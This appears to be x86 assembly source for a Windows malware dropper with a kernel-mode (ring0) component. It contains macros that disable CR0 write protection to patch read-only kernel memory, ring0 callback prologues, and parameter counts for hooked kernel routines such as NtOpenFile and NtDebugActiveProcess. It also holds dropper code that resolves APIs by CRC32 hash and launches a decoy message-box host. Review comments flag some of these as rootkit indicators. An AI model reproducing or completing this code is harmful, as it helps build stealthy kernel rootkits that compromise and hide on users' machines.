; Stack-argument counts (dwords) for each callback / hooked routine, used as
; the `args` operand of @cb_end so the stdcall frame is cleaned correctly.
pssetcreateprocessnotifyroutine_param_count equ 02h
pssetremovecreatethreadnotifyroutine_params_count equ 01h
ntdebugactiveprocess_param_count equ 02h
ntenumeratebootentries_param_count equ 02h
ntopenfile_param_count equ 06h
custom_dpc_param_count equ 04h
driverentry_param_count equ 02h
driverunload_param_count equ 01h
;--------------------------------------
; DPC wdog context
;--------------------------------------
; Context for the watchdog timer: the DPC object, the timer that queues it,
; and a data pointer handed to the DPC routine.
wdog_context struct
Dpc kdpc <> ; 00h
Timer ktimer <> ; 20h
data dd ? ; 48h
wdog_context ends
;--------------------------------------
; macros
;--------------------------------------
; get callback parameter:
; Load stack parameter number pnum (0-based) of the current callback into reg.
; Only valid between @cb_begin and @cb_end: skips the 32-byte PUSHAD frame
; and the 4-byte return address.
@gparam macro reg, pnum
mov reg, dword ptr [esp + _pushad + 4 + (pnum * 4)]
endm
; initialize object attributes:
; Fill an object_attributes at address p: root directory r, name n (PUNICODE_STRING),
; attributes a. The single operand s is stored into both SecurityDescriptor and
; SecurityQualityOfService (callers pass NULL for both).
@init_object_attributes macro p, r, n, a, s
mov dword ptr [p + object_attributes._Length], size object_attributes
mov dword ptr [p + object_attributes.RootDirectory], r
mov dword ptr [p + object_attributes.ObjectName], n
mov dword ptr [p + object_attributes.Attributes], a
mov dword ptr [p + object_attributes.SecurityDescriptor], s
mov dword ptr [p + object_attributes.SecurityQualityOfService], s
endm
; ring0 callback begin:
; Prologue shared by every ring0 callback: saves all registers, then
; establishes ebp = load delta (getdelta is defined elsewhere and must leave
; it in ebp, as the next line uses ebp as base) and ebx = ring0data pointer
; stored at [ebp]. Pair with @cb_end.
@cb_begin macro
pushad ; save initial registers
call getdelta ; get delta offset: ebp
mov ebx, dword ptr [ebp] ; get ptr to ring0data: ebx
endm
; ring0 callback end:
; Epilogue paired with @cb_begin: stores eax into the saved-eax slot so popad
; does not discard the return value, restores registers and returns removing
; args*4 bytes of caller-pushed parameters (args = 0 emits `ret 0`, cdecl).
@cb_end macro args
mov dword ptr [esp + _pushad_eax], eax ; set ret value: eax
popad ; restore initial registers
ret (args * 4) ; clean stack: stdcall args >= 0, cdecl args = 0
endm
; disable page protection:
; Clear CR0.WP (bit 16 = 10000h) so that ring0 writes to read-only pages
; are no longer faulted, with interrupts disabled for the window.
; NOTE(review): both cli and CR0 are per-processor -- on an SMP system the
; other CPUs keep WP set and keep running. Writing into read-only kernel
; pages this way is a well-known rootkit indicator for integrity checkers.
@unprotect_mring0 macro
cli
push eax
mov eax, cr0
and eax, not 10000h
mov cr0, eax
pop eax
endm
; enable page protection:
; Set CR0.WP again and re-enable interrupts; pairs with @unprotect_mring0.
; NOTE(review): the sti is unconditional, so interrupts are re-enabled even
; if they were already disabled before @unprotect_mring0 was entered.
@protect_mring0 macro
push eax
mov eax, cr0
or eax, 10000h
mov cr0, eax
pop eax
sti
endm
; end string:
; Advance esi past the terminating NUL of the zero-terminated string at esi.
; Clobbers al and flags. Unbounded: relies on a terminator being present.
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
;--------------------------------------
; SEH
;--------------------------------------
; Stack layout seen by an SEH handler on entry: the return address followed
; by the four handler arguments. EH_EstablisherFrame points at the frame
; pushed by @ring3seh_setup_frame.
except_handler struct
EH_Dummy dd ? ; return address
EH_ExceptionRecord dd ?
EH_EstablisherFrame dd ?
EH_ContextRecord dd ?
EH_DispatcherContext dd ?
except_handler ends
; create seh frame:
; Install an SEH frame whose handler body is the macro operand.
; Normal flow: `call set_new_eh` pushes the address of the `mov esp` line
; (the handler entry) and jumps over the handler body; set_new_eh then pushes
; the previous fs:[0] so that [esp] = prev, [esp+4] = handler, and registers
; that record as the new fs:[0]. Execution continues after the macro.
; Exception flow: the OS calls the handler entry; it resets esp to the
; establisher frame (the record above) and runs `handler`, which presumably
; unlinks the frame itself (see @ring3seh_remove_frame).
@ring3seh_setup_frame macro handler
local set_new_eh
call set_new_eh
mov esp, dword ptr [esp + except_handler.EH_EstablisherFrame]
handler
set_new_eh: assume fs:nothing
push fs:[0]
mov fs:[0], esp
endm
; remove seh frame:
; Unlink the frame installed by @ring3seh_setup_frame: restore the previous
; fs:[0] and drop the saved handler address; esp must point at the record.
@ring3seh_remove_frame macro
assume fs:nothing
pop fs:[0]
add esp, 4
endm
;--------------------------------------
; dropper code
;--------------------------------------
.code
; Entry point of the carrier executable (ring3 dropper):
;  1. make the whole image [start, drv_end) writable with VirtualProtect;
;  2. walk the api_names table and store the CRC32 of every name into the
;     per-module hash tables (gen_crc32_szname and the consumers of the
;     tables are defined outside this view; presumably they resolve imports
;     by hash rather than by name -- confirm in ring3_start);
;  3. record host_start in host_start_ep, restore the original protection
;     and continue at ring3_start (defined elsewhere).
; Register use: eax = 0FFFh page mask, ecx = ~0FFFh, ebx = rounded length,
; edx = page-aligned base; esi/edi walk the name table / hash tables.
start:
xor eax, eax
dec eax ; eax = 0FFFFFFFFh
shr eax, 20 ; eax = 00000FFFh (low 12 bits: offset within a 4 KiB page)
mov ecx, eax
not ecx ; ecx = 0FFFFF000h page-alignment mask
mov ebx, offset drv_end - offset start
add ebx, eax
and ebx, ecx ; ebx = image length rounded up to a page multiple
mov edx, offset start
and edx, ecx ; edx = page-aligned base of the image
push edx ; saved for the restore call below
push eax ; this slot receives the old protection (lpflOldProtect)
push esp ; &old -> the slot just pushed
push PAGE_READWRITE
push ebx
push edx
call VirtualProtect ; VirtualProtect(base, length, PAGE_READWRITE, &old)
mov esi, offset api_names_begin
next_module_crc_table:
lodsd ; eax = destination hash table for this module; 0 terminates the walk
test eax, eax
jz end_crc
mov edi, eax
lodsb
movzx ecx, al ; ecx = number of names in this module's list
next_api_crc:
mov eax, esi
call gen_crc32_szname ; eax = CRC32 of the string at esi (defined elsewhere)
stosd
@endsz ; skip past the string's terminator
loop next_api_crc
xchg eax, ecx ; eax = 0 (ecx is 0 after the loop): terminator for the table
stosd
mov eax, esi
call gen_crc32_szname ; hash of the string that follows the list (presumably the module name)
stosd
@endsz
jmp next_module_crc_table
end_crc:
mov eax, offset host_start
mov dword ptr [host_start_ep], eax ; host_start_ep is defined elsewhere
pop eax ; eax = original page protection
pop edx ; edx = page-aligned base again
; NOTE(review): after the two pops esp is back at its entry value, so this
; &old argument makes VirtualProtect overwrite whatever the caller left at
; [esp] (the entry point's return address). It is only harmless because the
; code never returns through it (host_start ends in ExitProcess).
push esp
push eax
push ebx
push edx
call VirtualProtect ; restore the original protection
jmp ring3_start
; Host program reached through host_start_ep: shows a message box with the
; strings _title/_text (defined elsewhere) and exits with code 0.
host_start:
xor edi, edi ; edi = 0, reused for every NULL/0 argument below
push edi ; uType = 0 (MB_OK)
push offset _title
push offset _text
push edi ; hWnd = NULL
call MessageBox
push edi ; uExitCode = 0
call ExitProcess
api_names_begin: